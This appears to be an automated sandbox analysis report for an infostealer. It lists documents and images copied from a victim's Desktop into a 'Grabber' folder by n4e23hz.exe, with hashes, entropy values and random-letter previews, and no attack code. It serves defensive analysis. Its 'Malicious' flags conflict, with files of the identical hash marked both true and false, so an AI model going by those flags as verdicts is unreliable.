SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\HTAGVDFUIE.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\KATAXZVCPS.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\UMMBDNEQBN.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	true
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN\BPMLNOBVSB.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702896917219035
Encrypted:	false
SSDEEP:	24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
MD5:	C68274AA8B7F713157BEBE2FCC2EA5D3
SHA1:	52A5A2D615A813B518DDAAC2A02095F1059DAAD5
SHA-256:	362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
SHA-512:	BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
Malicious:	true
Preview:	BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN\DVWHKMNFNN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
